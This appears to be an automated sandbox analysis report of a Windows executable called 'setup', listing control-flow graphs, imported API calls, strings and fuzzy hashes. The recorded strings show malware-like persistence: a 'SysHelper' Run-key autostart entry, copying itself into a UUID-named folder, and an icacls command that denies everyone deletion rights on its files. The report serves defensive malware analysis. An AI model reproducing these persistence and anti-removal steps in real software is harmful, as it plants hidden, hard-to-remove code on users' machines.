                control_flow_graph 606 411cd0-411d1a call 42f7c0 RegOpenKeyExW 609 411d20-411d8d call 42b420 RegQueryValueExW RegCloseKey 606->609 610 412207-412216 606->610 613 411d93-411d9c 609->613 614 411d8f-411d91 609->614 616 411da0-411da9 613->616 615 411daf-411dcb call 415c10 614->615 620 411dd1-411df8 lstrlenA call 413520 615->620 621 411e7c-411e87 615->621 616->616 617 411dab-411dad 616->617 617->615 629 411e28-411e2c 620->629 630 411dfa-411dfe 620->630 622 411e94-411f34 LoadLibraryW GetProcAddress GetCommandLineW CommandLineToArgvW lstrcpyW PathFindFileNameW UuidCreate UuidToStringW 621->622 623 411e89-411e91 call 422587 621->623 633 411f36-411f38 622->633 634 411f3a-411f3f 622->634 623->622 631 411e3c-411e50 PathFileExistsW 629->631 632 411e2e-411e39 call 422587 629->632 635 411e00-411e08 call 422587 630->635 636 411e0b-411e23 call 4145a0 630->636 631->621 642 411e52-411e57 631->642 632->631 640 411f4f-411f96 call 415c10 RpcStringFreeW PathAppendW CreateDirectoryW 633->640 641 411f40-411f49 634->641 635->636 636->629 653 411f98-411fa0 640->653 654 411fce-411fe9 640->654 641->641 645 411f4b-411f4d 641->645 646 411e59-411e5e 642->646 647 411e6a-411e6e 642->647 645->640 646->647 649 411e60-411e65 call 414690 646->649 647->610 651 411e74-411e77 647->651 649->647 655 4121ff-412204 call 422587 651->655 658 411fa2-411fa4 653->658 659 411fa6-411faf 653->659 656 411feb-411fed 654->656 657 411fef-411ff8 654->657 655->610 662 41200f-412076 call 415c10 PathAppendW GetLongPathNameW CopyFileW RegOpenKeyExW 656->662 663 412000-412009 657->663 664 411fbf-411fc9 call 415c10 658->664 661 411fb0-411fb9 659->661 661->661 666 411fbb-411fbd 661->666 671 4121d1-4121d5 662->671 672 41207c-412107 call 42b420 lstrcpyW lstrcatW * 2 lstrlenW RegSetValueExW RegCloseKey 662->672 663->663 668 41200b-41200d 663->668 664->654 666->664 668->662 673 4121e2-4121fa 671->673 674 4121d7-4121df call 422587 671->674 680 412115-4121a8 call 42b420 SetLastError lstrcpyW lstrcatW * 2 CreateProcessW 672->680 681 412109-412110 call 413260 672->681 673->610 677 4121fc 673->677 674->673 677->655 685 4121b2-4121b8 680->685 686 4121aa-4121b0 GetLastError 680->686 681->680 687 4121c0-4121cf WaitForSingleObject 685->687 686->671 687->671 687->687
                APIs
                • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
                • _memset.LIBCMT ref: 00411D3B
                • RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
                • lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
                • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
                • LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00411E99
                • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00411EA5
                • GetCommandLineW.KERNEL32 ref: 00411EB4
                • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00411EBF
                • lstrcpyW.KERNEL32(?,00000000), ref: 00411ECE
                • PathFindFileNameW.SHLWAPI(?), ref: 00411EDB
                • UuidCreate.RPCRT4(?), ref: 00411EFC
                • UuidToStringW.RPCRT4(?,?), ref: 00411F14
                • RpcStringFreeW.RPCRT4(00000000), ref: 00411F64
                • PathAppendW.SHLWAPI(?,?), ref: 00411F83
                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00411F8E
                • PathAppendW.SHLWAPI(?,?,?,?), ref: 0041202D
                • GetLongPathNameW.KERNEL32(?), ref: 00412036
                • CopyFileW.KERNEL32(?,?,00000000), ref: 0041204C
                • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 0041206E
                • _memset.LIBCMT ref: 00412090
                • lstrcpyW.KERNEL32(?,005002FC), ref: 004120AA
                • lstrcatW.KERNEL32(?,?), ref: 004120C0
                • lstrcatW.KERNEL32(?," --AutoStart), ref: 004120CE
                • lstrlenW.KERNEL32(?), ref: 004120D7
                • RegSetValueExW.KERNEL32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 004120F3
                • RegCloseKey.ADVAPI32(00000000), ref: 004120FC
                • _memset.LIBCMT ref: 00412120
                • SetLastError.KERNEL32(00000000), ref: 00412146
                • lstrcpyW.KERNEL32(?,icacls "), ref: 00412158
                • lstrcatW.KERNEL32(?,?), ref: 0041216D
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Path$File_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineNameOpenStringUuidValuelstrlen$AddressArgvCopyDirectoryErrorExistsFindFreeLastLibraryLoadLongProcQuery
                • String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
                • API String ID: 3217568621-1182136429
                • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                • Instruction ID: 715e32bd1e023583792331b7dbf49be96a7b9f80df69a50876529e1503cb0a0b
                • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                • Instruction Fuzzy Hash: 51E14171D00219EBDF24DBA0DD89FEE77B8BF04304F14416AE609E6191EB786A85CF58

                Control-flow Graph

                APIs
                • GetCommandLineW.KERNEL32 ref: 00412235
                • CommandLineToArgvW.SHELL32(00000000,?), ref: 00412240
                • PathFindFileNameW.SHLWAPI(00000000), ref: 00412248
                • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00412256
                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041226A
                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00412275
                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00412280
                • LoadLibraryW.KERNEL32(Psapi.dll), ref: 00412291
                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041229F
                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004122AA
                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004122B5
                • K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 004122CD
                • OpenProcess.KERNEL32(00000410,00000000,?), ref: 004122FE
                • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00412315
                • K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 0041232C
                • CloseHandle.KERNEL32(00000000), ref: 00412347
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
                • API String ID: 3668891214-3807497772
                • Opcode ID: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
                • Instruction ID: 197cd9f83d52dd112842658ec983a676e251e24b3cd7e802a51fbc3a937a58d5
                • Opcode Fuzzy Hash: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
                • Instruction Fuzzy Hash: A3315371E0021DAFDB11AFE5DC45EEEBBB8FF45704F04406AF904E2190DA749A418FA5

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 975 423576-42358f 976 423591-42359b call 425208 call 4242d2 975->976 977 4235a9-4235be call 42b420 975->977 986 4235a0 976->986 977->976 982 4235c0-4235c3 977->982 984 4235d7-4235dd 982->984 985 4235c5 982->985 989 4235e9 call 42fb64 984->989 990 4235df 984->990 987 4235c7-4235c9 985->987 988 4235cb-4235d5 call 425208 985->988 991 4235a2-4235a8 986->991 987->984 987->988 988->986 996 4235ee-4235fa call 42f803 989->996 990->988 993 4235e1-4235e7 990->993 993->988 993->989 999 423600-42360c call 42f82d 996->999 1000 4237e5-4237ef call 4242fd 996->1000 999->1000 1005 423612-42361e call 42f857 999->1005 1005->1000 1008 423624-42362b 1005->1008 1009 42369b-4236a6 call 42f939 1008->1009 1010 42362d 1008->1010 1009->991 1016 4236ac-4236af 1009->1016 1012 423637-423653 call 42f939 1010->1012 1013 42362f-423635 1010->1013 1012->991 1020 423659-42365c 1012->1020 1013->1009 1013->1012 1018 4236b1-4236ba call 42fbb4 1016->1018 1019 4236de-4236eb 1016->1019 1018->1019 1028 4236bc-4236dc 1018->1028 1022 4236ed-4236fc call 4305a0 1019->1022 1023 423662-42366b call 42fbb4 1020->1023 1024 42379e-4237a0 1020->1024 1031 423709-423730 call 4304f0 call 4305a0 1022->1031 1032 4236fe-423706 1022->1032 1023->1024 1033 423671-423689 call 42f939 1023->1033 1024->991 1028->1022 1041 423732-42373b 1031->1041 1042 42373e-423765 call 4304f0 call 4305a0 1031->1042 1032->1031 1033->991 1038 42368f-423696 1033->1038 1038->1024 1041->1042 1047 423773-423782 call 4304f0 1042->1047 1048 423767-423770 1042->1048 1051 423784 1047->1051 1052 4237af-4237c8 1047->1052 1048->1047 1055 423786-423788 1051->1055 1056 42378a-423798 1051->1056 1053 4237ca-4237e3 1052->1053 1054 42379b 1052->1054 1053->1024 1054->1024 1055->1056 1057 4237a5-4237a7 1055->1057 1056->1054 1057->1024 1058 4237a9 1057->1058 1058->1052 1059 4237ab-4237ad 1058->1059 1059->1024 1059->1052
                APIs
                • _memset.LIBCMT ref: 004235B1
                  • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                • __gmtime64_s.LIBCMT ref: 0042364A
                • __gmtime64_s.LIBCMT ref: 00423680
                • __gmtime64_s.LIBCMT ref: 0042369D
                • __allrem.LIBCMT ref: 004236F3
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042370F
                • __allrem.LIBCMT ref: 00423726
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423744
                • __allrem.LIBCMT ref: 0042375B
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423779
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit_memset
                • String ID:
                • API String ID: 1503770280-0
                • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                • Instruction ID: ab95fd8d4aa8d0004faaa41ec126efad4d06c0b8c45c9850b5361983c80b405c
                • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                • Instruction Fuzzy Hash: 6E7108B1B00726BBD7149E6ADC41B5AB3B8AF40729F54823FF514D6381E77CEA408798

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1060 425141-42514d call 427d6c call 428c48 1065 425157-42516a call 4324f7 1060->1065 1066 42514f-425156 call 4251b7 1060->1066 1065->1066 1071 42516c-425174 call 428c96 1065->1071 1073 425179-42517f 1071->1073 1074 425181-425191 call 432553 1073->1074 1075 4251ae-4251b6 call 4251b7 1073->1075 1074->1075 1080 425193-4251ad call 42508e GetCurrentThreadId 1074->1080
                APIs
                • __init_pointers.LIBCMT ref: 00425141
                  • Part of subcall function 00427D6C: EncodePointer.KERNEL32(00000000,?,00425146,00423FFE,00507990,00000014), ref: 00427D6F
                  • Part of subcall function 00427D6C: __initp_misc_winsig.LIBCMT ref: 00427D8A
                  • Part of subcall function 00427D6C: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004326B3
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004326C7
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004326DA
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004326ED
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00432700
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00432713
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00432726
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00432739
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0043274C
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0043275F
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00432772
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00432785
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00432798
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 004327AB
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 004327BE
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 004327D1
                • __mtinitlocks.LIBCMT ref: 00425146
                • __mtterm.LIBCMT ref: 0042514F
                  • Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B62
                  • Part of subcall function 004251B7: _free.LIBCMT ref: 00428B69
                  • Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(0050AC00,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B8B
                • __calloc_crt.LIBCMT ref: 00425174
                • __initptd.LIBCMT ref: 00425196
                • GetCurrentThreadId.KERNEL32 ref: 0042519D
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                • String ID:
                • API String ID: 3567560977-0
                • Opcode ID: ba76334793eead2fa168906c5bd492539b931eab390f8d8b833b1323b4595286
                • Instruction ID: 366d1241f395ce705af539ece55ec53f654f371a685379b5f067519d47a60e56
                • Opcode Fuzzy Hash: ba76334793eead2fa168906c5bd492539b931eab390f8d8b833b1323b4595286
                • Instruction Fuzzy Hash: 75F0CD32B4AB712DE2343AB67D03B6B2680AF00738BA1061FF064C42D1EF388401455C

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1083 427b0b-427b1a call 427ad7 ExitProcess
                APIs
                • ___crtCorExitProcess.LIBCMT ref: 00427B11
                  • Part of subcall function 00427AD7: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,i;B,00427B16,i;B,?,00428BCA,000000FF,0000001E,00507BD0,00000008,00428B0E,i;B,i;B), ref: 00427AE6
                  • Part of subcall function 00427AD7: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00427AF8
                • ExitProcess.KERNEL32 ref: 00427B1A
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: ExitProcess$AddressHandleModuleProc___crt
                • String ID: i;B
                • API String ID: 2427264223-472376889
                • Opcode ID: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
                • Instruction ID: 59367741208a4d0b8125be5957acfda0e57e61d39344a7bf1a3f5abf2379cf84
                • Opcode Fuzzy Hash: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
                • Instruction Fuzzy Hash: 0DB09230404108BBCB052F52EC0A85D3F29EB003A0B408026F90848031EBB2AA919AC8

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1086 40ef50-40ef7a call 420c62 1089 40efdc-40efe2 1086->1089 1090 40ef7c 1086->1090 1091 40ef80-40ef85 call 420c62 1090->1091 1093 40ef8a-40efbd call 42b420 1091->1093 1096 40efc0-40efcf 1093->1096 1096->1096 1097 40efd1-40efda 1096->1097 1097->1089 1097->1091
                APIs
                • _malloc.LIBCMT ref: 0040EF69
                  • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                  • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                  • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00740000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                • _malloc.LIBCMT ref: 0040EF85
                • _memset.LIBCMT ref: 0040EF9B
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _malloc$AllocateHeap_memset
                • String ID:
                • API String ID: 3655941445-0
                • Opcode ID: 030ce5304eb8d874ea407c5a52bd42f85663f8070df60884b58911fa6b375070
                • Instruction ID: 5fa84ec4042e21db229fa26042ce02b7cce951e2f5e2b33d0654eda62efe4b83
                • Opcode Fuzzy Hash: 030ce5304eb8d874ea407c5a52bd42f85663f8070df60884b58911fa6b375070
                • Instruction Fuzzy Hash: 06110631600624EFCB10DF99D881A5ABBB5FF89314F2445A9E9489F396D731B912CBC1

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1098 42fb64-42fb77 call 428520 1101 42fba5-42fbaa call 428565 1098->1101 1102 42fb79-42fb8c call 428af7 1098->1102 1107 42fb99-42fba0 call 42fbab 1102->1107 1108 42fb8e call 42fe47 1102->1108 1107->1101 1111 42fb93 1108->1111 1111->1107
                APIs
                • __lock.LIBCMT ref: 0042FB7B
                  • Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
                  • Part of subcall function 00428AF7: __amsg_exit.LIBCMT ref: 00428B15
                  • Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(i;B,?,004250D7,0000000D), ref: 00428B22
                • __tzset_nolock.LIBCMT ref: 0042FB8E
                  • Part of subcall function 0042FE47: __lock.LIBCMT ref: 0042FE6C
                  • Part of subcall function 0042FE47: ____lc_codepage_func.LIBCMT ref: 0042FEB3
                  • Part of subcall function 0042FE47: __getenv_helper_nolock.LIBCMT ref: 0042FED4
                  • Part of subcall function 0042FE47: _free.LIBCMT ref: 0042FF07
                  • Part of subcall function 0042FE47: _strlen.LIBCMT ref: 0042FF0E
                  • Part of subcall function 0042FE47: __malloc_crt.LIBCMT ref: 0042FF15
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: __lock$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__malloc_crt__mtinitlocknum__tzset_nolock_free_strlen
                • String ID:
                • API String ID: 1282695788-0
                • Opcode ID: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
                • Instruction ID: e2ddc43a93f61bf79f0790849a809cb79cc8f4f227a559e0d4967367be19fad2
                • Opcode Fuzzy Hash: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
                • Instruction Fuzzy Hash: 69E0BF35E41664DAD620A7A2F91B75C7570AB14329FD0D16F9110111D28EBC15C8DA2E

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1112 427f3d-427f47 call 427e0e 1114 427f4c-427f50 1112->1114
                APIs
                • _doexit.LIBCMT ref: 00427F47
                  • Part of subcall function 00427E0E: __lock.LIBCMT ref: 00427E1C
                  • Part of subcall function 00427E0E: DecodePointer.KERNEL32(00507B08,0000001C,00427CFB,00423B69,00000001,00000000,i;B,00427C49,000000FF,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E5B
                  • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E6C
                  • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E85
                  • Part of subcall function 00427E0E: DecodePointer.KERNEL32(-00000004,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E95
                  • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E9B
                  • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EB1
                  • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EBC
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Pointer$Decode$Encode$__lock_doexit
                • String ID:
                • API String ID: 2158581194-0
                • Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                • Instruction ID: a7e7560d2adc556c6fb323ffd13f600db444db9a7111c1ec19eeb8b3048b151f
                • Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                • Instruction Fuzzy Hash: ABB01271A8430C33DA113642FC03F053B0C4740B54F610071FA0C2C5E1A593B96040DD
                APIs
                • GetVersionExA.KERNEL32(00000094), ref: 00481983
                • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00481994
                • LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 004819A1
                • LoadLibraryA.KERNEL32(NETAPI32.DLL), ref: 004819AE
                • GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 004819E8
                • GetProcAddress.KERNEL32(?,NetApiBufferFree), ref: 004819FB
                • FreeLibrary.KERNEL32(?), ref: 00481AC5
                • GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 00481ADB
                • GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 00481AEE
                • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00481B01
                • FreeLibrary.KERNEL32(?), ref: 00481C15
                • LoadLibraryA.KERNEL32(USER32.DLL), ref: 00481C36
                • GetProcAddress.KERNEL32(00000000,GetForegroundWindow), ref: 00481C50
                • GetProcAddress.KERNEL32(?,GetCursorInfo), ref: 00481C63
                • GetProcAddress.KERNEL32(?,GetQueueStatus), ref: 00481C76
                • FreeLibrary.KERNEL32(?), ref: 00481D45
                • GetProcAddress.KERNEL32(?,CreateToolhelp32Snapshot), ref: 00481D73
                • GetProcAddress.KERNEL32(?,CloseToolhelp32Snapshot), ref: 00481D86
                • GetProcAddress.KERNEL32(?,Heap32First), ref: 00481D99
                • GetProcAddress.KERNEL32(?,Heap32Next), ref: 00481DAC
                • GetProcAddress.KERNEL32(?,Heap32ListFirst), ref: 00481DBF
                • GetProcAddress.KERNEL32(?,Heap32ListNext), ref: 00481DD2
                • GetProcAddress.KERNEL32(?,Process32First), ref: 00481DE5
                • GetProcAddress.KERNEL32(?,Process32Next), ref: 00481DF8
                • GetProcAddress.KERNEL32(?,Thread32First), ref: 00481E0B
                • GetProcAddress.KERNEL32(?,Thread32Next), ref: 00481E1E
                • GetProcAddress.KERNEL32(?,Module32First), ref: 00481E31
                • GetProcAddress.KERNEL32(?,Module32Next), ref: 00481E44
                • GetTickCount.KERNEL32 ref: 00481F03
                • GetTickCount.KERNEL32 ref: 00481FF1
                • GetTickCount.KERNEL32 ref: 00482066
                • GetTickCount.KERNEL32 ref: 00482095
                • GetTickCount.KERNEL32 ref: 004820FB
                • GetTickCount.KERNEL32 ref: 00482118
                • GetTickCount.KERNEL32 ref: 00482187
                • GetTickCount.KERNEL32 ref: 004821A4
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: AddressProc$CountTick$Library$Load$Free$Version
                • String ID: $$ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$GetCursorInfo$GetForegroundWindow$GetQueueStatus$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next$USER32.DLL
                • API String ID: 842291066-1723836103
                • Opcode ID: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
                • Instruction ID: 1a290f2a1335d0d3a86819d1d60d6f49a84e0195e1de194fff26f42f4ca9d5b3
                • Opcode Fuzzy Hash: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
                • Instruction Fuzzy Hash: 683273B0E002299ADB61AF64CC45B9EB6B9FF45704F0045EBE60CE6151EB788E84CF5D
                APIs
                • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00411010
                • __CxxThrowException@8.LIBCMT ref: 00411026
                  • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0041103B
                • __CxxThrowException@8.LIBCMT ref: 00411051
                • lstrlenA.KERNEL32(?,00000000), ref: 00411059
                • CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00411064
                • __CxxThrowException@8.LIBCMT ref: 0041107A
                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00411099
                • __CxxThrowException@8.LIBCMT ref: 004110AB
                • _memset.LIBCMT ref: 004110CA
                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 004110DE
                • __CxxThrowException@8.LIBCMT ref: 004110F0
                • _malloc.LIBCMT ref: 00411100
